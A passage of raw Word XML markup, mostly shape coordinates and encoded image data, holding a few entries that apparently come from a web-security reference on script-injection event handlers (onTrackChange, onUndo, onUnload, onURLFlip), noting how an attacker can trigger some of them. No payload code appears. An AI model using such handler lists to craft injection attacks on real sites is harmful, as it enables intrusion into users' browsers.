                                  <a:pt x="131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Text Box 83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133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onTrackChange()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6" o:spid="_x0000_s1596" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:66.85pt;height:9.15pt;z-index:-17586688;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154" coordsize="133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">
                <v:shape id="Freeform 838" o:spid="_x0000_s1597" style="position:absolute;left:1930;top:154;width:1337;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="133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aBjscA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvYhurGBDdJXWtiD0II0ieHtk&#10;n8m22bchu9Xor3cLgsdhZr5hZovO1uJIrTeOFYyGCQjiwmnDpYLt5nOQgvABWWPtmBScycNi/tCb&#10;Yabdib/pmIdSRAj7DBVUITSZlL6oyKIfuoY4egfXWgxRtqXULZ4i3NbyOUkm0qLhuFBhQ8uKit/8&#10;zyr42O+2I/Pz1b2Uy3xt0nP/8vZOSj09dq9TEIG6cA/f2iutIB1P4P9MPAJyf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2gY7HAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m1316,182l21,182r-3,l,161r,-3l,21,21,,1316,r21,21l1337,161r-18,21l1316,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1316,336;21,336;18,336;0,315;0,312;0,175;21,154;1316,154;1337,175;1337,315;1319,336;1316,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 837" o:spid="_x0000_s1598" type="#_x0000_t202" style="position:absolute;left:1930;top:154;width:133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RViMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3upGBWujq4hUEARpTA89vmaf&#10;yWL2bZrdavz3riB4HGbmG2a+7GwtztR641jBcJCAIC6cNlwq+M43b1MQPiBrrB2Tgit5WC56L3NM&#10;tbtwRudDKEWEsE9RQRVCk0rpi4os+oFriKN3dK3FEGVbSt3iJcJtLUdJMpEWDceFChtaV1ScDv9W&#10;weqHs0/zt//9yo6ZyfOPhHeTk1Kv/W41AxGoC8/wo73VCqbjd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pFWI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onTrackChange()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6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>changes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>track</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>playList)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252"/>
          <w:tab w:val="left" w:pos="1253"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:left="1252" w:hanging="1148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3030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105410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="832" name="Group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166"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="833" name="Freeform 835"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="166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348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2650 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2671 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2671 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2653 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2650 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 742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Text Box 83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6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onUndo()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3" o:spid="_x0000_s1599" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:37.1pt;height:9.15pt;z-index:-17586176;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166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">
                <v:shape id="Freeform 835" o:spid="_x0000_s1600" style="position:absolute;left:1930;top:166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FsRsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP0WrCQBRE34X+w3KFvkjdtQFJUzehFEpjEaTqB1yy&#10;1ySYvRuy25j+fVco+DjMzBlmU0y2EyMNvnWsYbVUIIgrZ1quNZyOH08pCB+QDXaOScMveSjyh9kG&#10;M+Ou/E3jIdQiQthnqKEJoc+k9FVDFv3S9cTRO7vBYohyqKUZ8BrhtpPPSq2lxZbjQoM9vTdUXQ4/&#10;VsPndtf56YSlPeLL6mt/UbtxobR+nE9vryACTeEe/m+XRkOaJHA7E4+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EWxGxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m720,182r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,348;21,348;18,348;0,327;0,324;0,187;21,166;720,166;741,187;741,327;723,348;720,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 834" o:spid="_x0000_s1601" type="#_x0000_t202" style="position:absolute;left:1930;top:166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bL/8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3WjLaLRVURaEARpjAePz+wz&#10;Wcy+TbOrpv/eLRR6HGbmG2ax6mwt7tR641jBaJiAIC6cNlwqOOafr1MQPiBrrB2Tgh/ysFr2XhaY&#10;avfgjO6HUIoIYZ+igiqEJpXSFxVZ9EPXEEfv4lqLIcq2lLrFR4TbWo6TZCItGo4LFTa0qai4Hm5W&#10;wfrE2Yf53p+/sktm8nyW8G5yVWrQ79ZzEIG68B/+a2+1gunbO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dsv/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onUndo()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(user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>went</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>backward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>undo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>transaction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>history)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420"/>
          <w:tab w:val="left" w:pos="1421"/>
        </w:tabs>
        <w:ind w:left="1420" w:hanging="1316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3081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97790</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="829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154"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="830" name="Freeform 832"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="154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336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 912"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 912"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 912"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 912"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 912"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 912"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2820 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 912"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2842 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 912"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2842 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 912"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2824 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 912"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2820 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 912"/>
                              <a:gd name="T46" fmla="+- 0 336 154"/>
                              <a:gd name="T47" fmla="*/ 3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Text Box 83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4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onUnload()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0" o:spid="_x0000_s1602" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:45.6pt;height:9.15pt;z-index:-17585664;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154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">
                <v:shape id="Freeform 832" o:spid="_x0000_s1603" style="position:absolute;left:1930;top:154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/pZsAA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPzYrCMBC+C75DGMGbprqgbjWKiLurIMiqDzA0s03Z&#10;ZtI2Uevbm4Pg8eP7X6xaW4obNb5wrGA0TEAQZ04XnCu4nL8GMxA+IGssHZOCB3lYLbudBaba3fmX&#10;bqeQixjCPkUFJoQqldJnhiz6oauII/fnGoshwiaXusF7DLelHCfJRFosODYYrGhjKPs/Xa2C+vtY&#10;EP9sx3Xt3fScHYzZf7ZK9Xvteg4iUBve4pd7pxXMPuL8eCYeAbl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/pZsAAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA9QAAAIUDAAAAAA==&#10;" path="m890,182r-869,l18,182,,161r,-3l,21,21,,890,r22,21l912,161r-18,21l890,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,336;21,336;18,336;0,315;0,312;0,175;21,154;890,154;912,175;912,315;894,336;890,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 831" o:spid="_x0000_s1604" type="#_x0000_t202" style="position:absolute;left:1930;top:154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FoZ8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVems2VhBN3YhIBaFQGuPB42v2&#10;mSzJvo3ZVdN/3y0UPA4z8w2zXI22E1cavHGsYJKkIIgrpw3XCg7l9mUOwgdkjZ1jUvBDHlb548MS&#10;M+1uXNB1H2oRIewzVNCE0GdS+qohiz5xPXH0Tm6wGKIcaqkHvEW47eRrms6kRcNxocGeNg1V7f5i&#10;FayPXLyb8+f3V3EqTFkuUv6YtUo9P43rNxCBxnAP/7d3WsF8OoG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AWhn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onUnload()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(as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>clicks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>presses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>back</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>forces</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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click)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1504"/>
          <w:tab w:val="left" w:pos="1506"/>
        </w:tabs>
        <w:spacing w:before="161" w:line="319" w:lineRule="auto"/>
        <w:ind w:left="464" w:right="465" w:hanging="359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3132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633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="826" name="Group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167"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="827" name="Freeform 829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349 167"/>
                              <a:gd name="T3" fmla="*/ 349 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 349 167"/>
                              <a:gd name="T7" fmla="*/ 349 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 349 167"/>
                              <a:gd name="T11" fmla="*/ 349 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 328 167"/>
                              <a:gd name="T15" fmla="*/ 328 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 325 167"/>
                              <a:gd name="T19" fmla="*/ 325 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 188 167"/>
                              <a:gd name="T23" fmla="*/ 188 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 167 167"/>
                              <a:gd name="T27" fmla="*/ 167 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2906 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 167 167"/>
                              <a:gd name="T31" fmla="*/ 167 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2927 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 188 167"/>
                              <a:gd name="T35" fmla="*/ 188 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2927 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 328 167"/>
                              <a:gd name="T39" fmla="*/ 328 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2909 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 349 167"/>
                              <a:gd name="T43" fmla="*/ 349 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2906 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 997"/>
                              <a:gd name="T46" fmla="+- 0 349 167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Text Box 82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onURLFlip()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7" o:spid="_x0000_s1605" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.35pt;width:49.85pt;height:9.15pt;z-index:-17585152;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,167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">
                <v:shape id="Freeform 829" o:spid="_x0000_s1606" style="position:absolute;left:1930;top:167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i9CMYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvIhutNDG6CpSEXpohUa9P7PP&#10;JJh9m+5uNP333YLQ4zAz3zCLVW8acSXna8sKJuMEBHFhdc2lgsN+O0pB+ICssbFMCn7Iw2r5+LDA&#10;TNsbf9E1D6WIEPYZKqhCaDMpfVGRQT+2LXH0ztYZDFG6UmqHtwg3jZwmyYs0WHNcqLClt4qKS94Z&#10;BZ/fM7nZNJf1cPdx7nx3Op6e9USpwVO/noMI1If/8L39rhWk01f4OxOP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9i9CMYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m976,182r-955,l18,182,,161r,-3l,21,21,,976,r21,21l997,161r-18,21l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,349;21,349;18,349;0,328;0,325;0,188;21,167;976,167;997,188;997,328;979,349;976,349" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 828" o:spid="_x0000_s1607" type="#_x0000_t202" style="position:absolute;left:1930;top:167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JXJ8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dBzXxj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OJXJ8AAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA9QAAAIU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onURLFlip()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(this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Advanced</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Streaming</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(ASF)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>file,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>played</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>HTML+TIME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(Timed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
          <w:sz w:val="16"/>
